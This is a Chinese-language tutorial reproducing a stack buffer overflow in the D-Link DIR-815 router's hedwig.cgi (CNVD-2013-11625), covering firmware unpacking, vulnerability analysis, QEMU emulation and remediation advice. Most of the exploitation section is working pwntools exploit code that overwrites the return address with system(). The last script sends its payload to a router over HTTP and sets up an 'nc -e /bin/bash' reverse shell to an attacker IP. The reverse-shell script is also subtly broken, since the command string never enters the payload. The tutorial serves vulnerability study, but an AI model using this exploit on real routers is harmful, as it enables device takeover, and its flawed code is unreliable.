DIR-815 栈溢出漏洞(CNVD-2013-11625)复现教程<\/h1>

1. 复现环境及工具准备<\/h2>

1.1 基础环境<\/h3>

操作系统<\/strong>: Ubuntu 24.04.2 LTS<\/li>
目标设备<\/strong>: D-Link DIR-815路由器<\/li>

固件版本<\/strong>: DIR815A1_FW103b01.bin<\/li> <\/ul>
1.2 必要工具<\/h3>

binwalk<\/strong>: 用于固件解包<\/p>

安装方法: sudo apt install binwalk<\/code><\/li> <\/ul> <\/li>
sasquatch<\/strong>: binwalk解压非标准SquashFS文件系统的关键依赖<\/p> 安装步骤: sudo apt install build-essential liblzma-dev liblzo2-dev zlib1g-dev <\/span><\/span>git clone https:\/\/github.com\/devttys0\/sasquatch <\/span><\/span>cd sasquatch <\/span><\/span>.\/build.sh <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> QEMU<\/strong>: 用于模拟路由器环境<\/p> 安装方法: sudo apt install qemu qemu-system qemu-user-static<\/code><\/li> <\/ul> <\/li> 交叉编译工具链<\/strong>: 用于MIPS架构分析<\/p> 安装方法: sudo apt install gcc-mipsel-linux-gnu g++-mipsel-linux-gnu<\/code><\/li> <\/ul> <\/li> <\/ol> 2. 漏洞基本信息<\/h2> 2.1 漏洞描述<\/h3> 漏洞编号<\/strong>: CNVD-2013-11625<\/li> 影响设备<\/strong>: D-Link DIR-815路由器<\/li> 漏洞文件<\/strong>: \/htdocs\/web\/hedwig.cgi<\/code> (实际为\/htdocs\/cgibin<\/code>的软链接)<\/li> 漏洞类型<\/strong>: 栈缓冲区溢出<\/li> 漏洞成因<\/strong>: sprintf<\/code>函数未对用户输入的cookie中uid=<\/code>后的内容进行长度检查<\/li> <\/ul> 2.2 漏洞位置<\/h3> 漏洞存在于hedwigcgi_main<\/code>函数中的两个sprintf<\/code>调用处，向固定大小的缓冲区(v27[1024]<\/code>)写入可控长度的uid=<\/code>后内容。<\/p> 3. 固件分析<\/h2> 3.1 固件解包<\/h3> binwalk -Me DIR815A1_FW103b01.bin <\/span><\/span><\/code><\/pre>解包后得到_DIR815A1_FW103b01.bin.extracted<\/code>目录，关键文件位于squashfs-root<\/code>子目录中。<\/p> 3.2 文件修复<\/h3> 解包后可能需要修复软链接问题：<\/p> 修改\/usr\/lib\/python3\/dist-packages\/binwalk\/modules\/extractor.py<\/code><\/li> 找到处理软链接的部分，确保不将软链接指向\/dev\/null<\/code><\/li> <\/ol> 3.3 保护机制检查<\/h3> 使用checksec<\/code>检查目标文件：<\/p> checksec --file=<\/span>.\/squashfs-root\/htdocs\/cgibin <\/span><\/span><\/code><\/pre>结果显示无任何保护机制(NX, ASLR, Stack Canary等均未开启)。<\/p> 4. 漏洞分析<\/h2> 4.1 关键函数分析<\/h3> hedwigcgi_main函数<\/strong>:<\/p> 要求POST请求方式<\/li> 调用cgibin_parse_request<\/code>处理请求<\/li> 调用sess_get_uid<\/code>从cookie中提取uid=<\/code>后内容<\/li> <\/ul> <\/li> sess_get_uid函数<\/strong>:<\/p> 从环境变量HTTP_COOKIE<\/code>获取cookie<\/li> 分离uid=<\/code>后的内容<\/li> 将内容返回给调用者<\/li> <\/ul> <\/li> 漏洞触发点<\/strong>:<\/p> 两个sprintf<\/code>调用均向v27[1024]<\/code>写入可控内容<\/li> 第一个sprintf<\/code>: sprintf(v27, "%s\/%s_post.xml", "\/var\/tmp", string)<\/code><\/li> 第二个sprintf<\/code>: sprintf(v27, "%s\/%s", "\/var\/tmp", string)<\/code><\/li> <\/ul> <\/li> <\/ol> 4.2 利用条件<\/h3> 需要存在\/var\/tmp<\/code>目录<\/li> 需要设置环境变量: REQUEST_METHOD=POST<\/code><\/li> CONTENT_TYPE=application\/x-www-form-urlencoded<\/code><\/li> REQUEST_URI<\/code>需要有内容<\/li> <\/ul> <\/li> <\/ol> 5. 漏洞利用<\/h2> 5.1 QEMU用户态模拟利用<\/h3> 5.1.1 环境准备<\/h4> cp -r squashfs-root \/tmp <\/span><\/span>cd \/tmp\/squashfs-root <\/span><\/span>mkdir -p var\/tmp <\/span><\/span><\/code><\/pre>5.1.2 偏移量计算<\/h4> 创建测试脚本test.py<\/code>:<\/li> <\/ol> from<\/span> pwn import<\/span> *<\/span> <\/span><\/span>import<\/span> os <\/span><\/span> <\/span><\/span>context.<\/span>arch =<\/span> 'mips'<\/span> <\/span><\/span>context.<\/span>endian =<\/span> 'little'<\/span> <\/span><\/span> <\/span><\/span>def<\/span> send_payload<\/span>(payload): <\/span><\/span> env =<\/span> { <\/span><\/span> "REQUEST_METHOD"<\/span>: "POST"<\/span>, <\/span><\/span> "CONTENT_TYPE"<\/span>: "application\/x-www-form-urlencoded"<\/span>, <\/span><\/span> "REQUEST_URI"<\/span>: "a"<\/span>*<\/span>0x10<\/span>, <\/span><\/span> "HTTP_COOKIE"<\/span>: "uid="<\/span> +<\/span> payload <\/span><\/span> } <\/span><\/span> os.<\/span>execve(".\/qemu-mipsel-static"<\/span>, [".\/qemu-mipsel-static"<\/span>, "-g"<\/span>, "1234"<\/span>, ".\/htdocs\/cgibin"<\/span>], env) <\/span><\/span> <\/span><\/span>payload =<\/span> cyclic(2000<\/span>) <\/span><\/span>send_payload(payload) <\/span><\/span><\/code><\/pre> 使用GDB调试计算偏移:<\/li> <\/ol> gdb-multiarch -q .\/htdocs\/cgibin <\/span><\/span>> target remote :1234 <\/span><\/span>> c <\/span><\/span><\/code><\/pre>通过崩溃时的寄存器值计算得偏移量为1009字节。<\/p> 5.1.3 libc基址计算<\/h4> 在sess_get_uid<\/code>函数返回处下断点<\/li> 获取memset<\/code>函数地址(如:0x2b333a20)<\/li> 从libc文件(libuClibc-0.9.30.1.so<\/code>)中获取memset<\/code>偏移量(0x034A20)<\/li> 计算libc基址: 0x2b333a20 - 0x034A20 = 0x2B2FF000<\/code><\/li> <\/ol> 5.1.4 编写利用代码<\/h4> from<\/span> pwn import<\/span> *<\/span> <\/span><\/span>import<\/span> os <\/span><\/span> <\/span><\/span>context.<\/span>arch =<\/span> 'mips'<\/span> <\/span><\/span>context.<\/span>endian =<\/span> 'little'<\/span> <\/span><\/span> <\/span><\/span>libc_base =<\/span> 0x2B2FF000<\/span> <\/span><\/span>system =<\/span> libc_base +<\/span> 0x53200<\/span> <\/span><\/span> <\/span><\/span>payload =<\/span> b<\/span>'A'<\/span>*<\/span>1009<\/span> <\/span><\/span>payload +=<\/span> p32(system) <\/span><\/span>payload +=<\/span> b<\/span>'B'<\/span>*<\/span>4<\/span> <\/span><\/span>payload +=<\/span> p32(libc_base +<\/span> 0x56f84<\/span>) # "sh"字符串地址<\/span> <\/span><\/span> <\/span><\/span>env =<\/span> { <\/span><\/span> "REQUEST_METHOD"<\/span>: "POST"<\/span>, <\/span><\/span> "CONTENT_TYPE"<\/span>: "application\/x-www-form-urlencoded"<\/span>, <\/span><\/span> "REQUEST_URI"<\/span>: "a"<\/span>*<\/span>0x10<\/span>, <\/span><\/span> "HTTP_COOKIE"<\/span>: "uid="<\/span> +<\/span> payload.<\/span>decode('latin1'<\/span>) <\/span><\/span>} <\/span><\/span> <\/span><\/span>os.<\/span>execve(".\/qemu-mipsel-static"<\/span>, [".\/qemu-mipsel-static"<\/span>, ".\/htdocs\/cgibin"<\/span>], env) <\/span><\/span><\/code><\/pre>5.2 QEMU系统态模拟利用<\/h3> 5.2.1 环境准备<\/h4> 下载系统镜像和内核:<\/p> 镜像: debian_squeeze_mipsel_standard.qcow2<\/code><\/li> 内核: vmlinux-3.2.0-4-4kc-malta<\/code><\/li> <\/ul> <\/li> 创建网桥:<\/p> <\/li> <\/ol> sudo apt install bridge-utils uml-utilities <\/span><\/span>sudo brctl addbr br0 <\/span><\/span>sudo brctl addif br0 eth0 <\/span><\/span>sudo ifconfig br0 up <\/span><\/span>sudo dhclient br0 <\/span><\/span><\/code><\/pre> 启动QEMU:<\/li> <\/ol> qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta \ <\/span><\/span><\/span><\/span> -hda debian_squeeze_mipsel_standard.qcow2 \ <\/span><\/span><\/span><\/span> -append "root=\/dev\/sda1 console=tty0"<\/span> \ <\/span><\/span><\/span><\/span> -net nic,macaddr=<\/span>00:16:3e:00:00:01 \ <\/span><\/span><\/span><\/span> -net tap,ifname=<\/span>tap0,script=<\/span>no,downscript=<\/span>no \ <\/span><\/span><\/span><\/span> -nographic <\/span><\/span><\/code><\/pre>5.2.2 反弹shell利用<\/h4> 在攻击机监听端口:<\/li> <\/ol> nc -lvnp 8888<\/span> <\/span><\/span><\/code><\/pre> 利用代码:<\/li> <\/ol> from<\/span> pwn import<\/span> *<\/span> <\/span><\/span>import<\/span> requests <\/span><\/span> <\/span><\/span>context.<\/span>arch =<\/span> 'mips'<\/span> <\/span><\/span>context.<\/span>endian =<\/span> 'little'<\/span> <\/span><\/span> <\/span><\/span>libc_base =<\/span> 0x77f34000<\/span> <\/span><\/span>system =<\/span> libc_base +<\/span> 0x53200<\/span> <\/span><\/span> <\/span><\/span># nc -e \/bin\/bash <attacker_ip> 8888<\/span> <\/span><\/span>command =<\/span> "nc -e \/bin\/bash 192.168.1.100 8888"<\/span> <\/span><\/span>command_addr =<\/span> libc_base +<\/span> 0x56f84<\/span> <\/span><\/span> <\/span><\/span>payload =<\/span> b<\/span>'A'<\/span>*<\/span>1009<\/span> <\/span><\/span>payload +=<\/span> p32(system) <\/span><\/span>payload +=<\/span> b<\/span>'B'<\/span>*<\/span>4<\/span> <\/span><\/span>payload +=<\/span> p32(command_addr) <\/span><\/span> <\/span><\/span>headers =<\/span> { <\/span><\/span> "Cookie"<\/span>: "uid="<\/span> +<\/span> payload.<\/span>decode('latin1'<\/span>), <\/span><\/span> "Content-Type"<\/span>: "application\/x-www-form-urlencoded"<\/span> <\/span><\/span>} <\/span><\/span> <\/span><\/span>requests.<\/span>post("http:\/\/192.168.1.200\/hedwig.cgi"<\/span>, headers=<\/span>headers, data=<\/span>"a"<\/span>*<\/span>0x10<\/span>) <\/span><\/span><\/code><\/pre>6. 漏洞修复建议<\/h2> 对用户输入进行严格长度检查<\/li> 使用更安全的字符串处理函数(如snprintf<\/code>替代sprintf<\/code>)<\/li> 启用编译器的栈保护机制<\/li> 对cookie中的特殊字符进行过滤<\/li> <\/ol> 7. 参考资源<\/h2> 固件下载链接: 百度网盘<\/a><\/li> QEMU镜像下载: Index of \/~aurel32\/qemu\/mipsel<\/a><\/li> IDA MIPS插件: ida mips插件安装<\/a><\/li> MIPSROP工具: IDA插件 MIPSROP<\/a><\/li> <\/ol>